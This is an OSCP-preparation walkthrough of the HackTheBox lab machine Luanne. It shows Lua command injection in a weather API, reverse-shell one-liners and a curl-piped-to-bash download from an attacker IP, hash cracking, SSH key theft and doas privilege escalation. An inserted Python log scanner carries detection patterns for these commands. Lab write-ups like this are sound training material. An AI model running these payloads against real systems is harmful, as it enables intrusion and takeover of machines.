OSCP PREPARATIONS – HTB Luanne

Luanne is a retired vulnerable machine running the NetBSD operating system. After finding and exploiting its vulnerabilities, we are expected to obtain the user and root flags.
We start by scanning the target machine with nmap to learn what it exposes.
Classic Scan

Full Port Scan

As a result of the port scan, the following ports are open: 22/tcp ssh (OpenSSH 8.0), 80/tcp http (nginx 1.19.0) and 9001/tcp http (Medusa httpd 1.12).
Since there is no vulnerability on the ssh side, we continue with port 80.
Port 80 serves HTTP, so we continue enumeration in the browser.

When trying to log in, it keeps asking for credentials; we tried default credentials and could not log in.
We dismissed the prompt and tried again.
Here it redirects to port 3000.

Not much of a result here.

Let's run a directory and file scan with gobuster.
The directory scan returned the /robots.txt file.

We open /robots.txt.

Here the /robots.txt file mentions harvesting via /weather.

We run a gobuster scan against this directory.

We discovered the /forecast directory.
We go to the /forecast directory.

Here it tells us to use city=list and that the output is JSON; let's go to the URL bar and apply it.

This means we can query something on the server. The cities are listed.
Now we request the cities one by one.
When I typed the city London, the output was very detailed.

We note this information and continue.
Since it may be related to port 9001, let's go to that port.

This page also asks for credentials. Since Medusa/1.12 is specifically running on this port, let's Google whether it has a default password.

Entering this information was not successful.

When we looked at a different address, it gave us different credentials, and we were able to log in with them.

The page shows uptime, processes and memory. In the process section, a file with the .lua extension catches our attention.

Let's investigate the .lua file and find out what it is.

We see that Lua is a programming language and that it runs commands for the web service; if we write a Lua reverse shell, maybe we can get a shell on the server.
We searched Google for a Lua reverse shell.

We try it on the URL we saw in order to get a shell.
We get an error saying the JSON cannot be parsed properly.

Let's try to execute a command through Burp Suite while listening in the background.

We can't run any kind of command here.
Let's see if there is command injection in Lua:
os.execute("id")
When we try this, it returns the output of the id command.

We type our reverse shell command, but no result is returned:
os.execute("bash -i >& /dev/tcp/10.10.14.13/1234 0>&1")

Let's drop a reverse shell file here instead and trigger it with curl.
First, we prepare the reverse shell as an sh script, i.e. a shell script:

rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.13 4747 >/tmp/f

Then we start a web server with Python so the target can fetch this file.

The shell is ready to be caught; now the target machine needs to fetch this script and run it.
We already have command injection on the Lua side, so we open Burp Suite and fetch the script with curl:
curl+10.10.14.13:8000/shell.sh+|+bash

This is how we got a shell 😊
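As an added defender-side example (not part of the original write-up), the following Python scans constructed nginx-style access log lines for the kind of requests shown above: a city parameter that is not a plain city name and that carries Lua's os.execute or the curl-pipe-to-shell idiom. The sample log lines, the SAFE_CITY_RE pattern and the indicator names are assumptions made for this example.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed nginx-style access log lines (not taken from the write-up).
# The city values mirror what the text shows being sent to /weather/forecast.
SAMPLE_LOG = [
    '10.10.14.13 - - [16/Sep/2020:10:00:01 +0000] "GET /weather/forecast?city=list HTTP/1.1" 200 312',
    '10.10.14.13 - - [16/Sep/2020:10:00:05 +0000] "GET /weather/forecast?city=London HTTP/1.1" 200 1840',
    '10.10.14.13 - - [16/Sep/2020:10:01:09 +0000] "GET /weather/forecast?city=os.execute(%22id%22) HTTP/1.1" 200 0',
    '10.10.14.13 - - [16/Sep/2020:10:02:33 +0000] "GET /weather/forecast?city=os.execute(%22curl+10.10.14.13:8000/shell.sh+|+bash%22) HTTP/1.1" 200 0',
]

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# A well-formed city name for this API: letters, spaces, dots, apostrophes, hyphens.
SAFE_CITY_RE = re.compile(r"^[A-Za-z][A-Za-z .'-]*$")
# Indicators taken from the write-up: os.execute, curl piped to a shell,
# and the /dev/tcp, mkfifo and nc reverse-shell idioms.
INDICATORS = {
    "lua_os_execute": re.compile(r"os\.execute\s*\("),
    "curl_pipe_shell": re.compile(r"\bcurl\b.*\|\s*(ba)?sh\b"),
    "reverse_shell_idiom": re.compile(r"/dev/tcp/|\bmkfifo\b|\bnc\b"),
}


def inspect_line(line):
    """Return the list of finding names for one access-log line (empty if benign)."""
    m = REQUEST_RE.search(line)
    if not m:
        return ["unparseable_request"]
    # parse_qs percent-decodes values and turns '+' into spaces, so the
    # decoded city is what the Lua handler would actually have received.
    qs = parse_qs(urlsplit(m.group("target")).query)
    findings = []
    for city in qs.get("city", []):
        if city == "list" or SAFE_CITY_RE.match(city):
            continue
        findings.append("city_not_well_formed")
        findings += [name for name, rx in INDICATORS.items() if rx.search(city)]
    return findings


def scan(lines):
    """Map the index of every flagged line to its findings."""
    results = {}
    for i, line in enumerate(lines):
        findings = inspect_line(line)
        if findings:
            results[i] = findings
    return results


if __name__ == "__main__":
    for idx, findings in scan(SAMPLE_LOG).items():
        print(idx, findings)
```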

This user has restricted privileges.

Let's do local enumeration.
Let's first carefully examine the www folder, since the web service is served from there.

In the .htpasswd file we find a username and a hash.
Let's check on CrackStation whether this hash has already been cracked.

As can be seen, the hash was cracked: $1$vVVoNCsOl$lMtBS6GL2upDbR4Owhzyc0:iamthebest

We could not log in with it, because there is no webapi_user user on the system.

These are the credentials the website asked us for when we first entered it; let's try to log in with them.

We were able to log in.
/weather/forecast?city=list
/weather/forecast?city=London
These addresses return the same information we already found during enumeration, so there was no advantage for us.
We continue with local enumeration. Since the shell is plain sh, we couldn't run the automatic enumeration tools, which are limited in most cases anyway.
We enumerate manually.
We look at the listening network services.

We look at the processes that use these ports.

Here we were able to obtain the ssh key.

Now we will make an ssh connection using this ssh key.

The file devel_backup-2020-09-16.tar.gz.enc catches our attention.

We don't know how to open this file, so we search on Google.

Let's adapt the command from the reference we found and print the result.

Here we find a different hash value.

Let's crack this hash value with hashcat.

We cracked the hash and got the littlebear password.
Here I try to become root; commands such as sudo su do not work because it is an OpenBSD operating system, so we researched on Google how to become root.

We came across the doas command; let's try it.

As you can see, we were able to get our root flag here.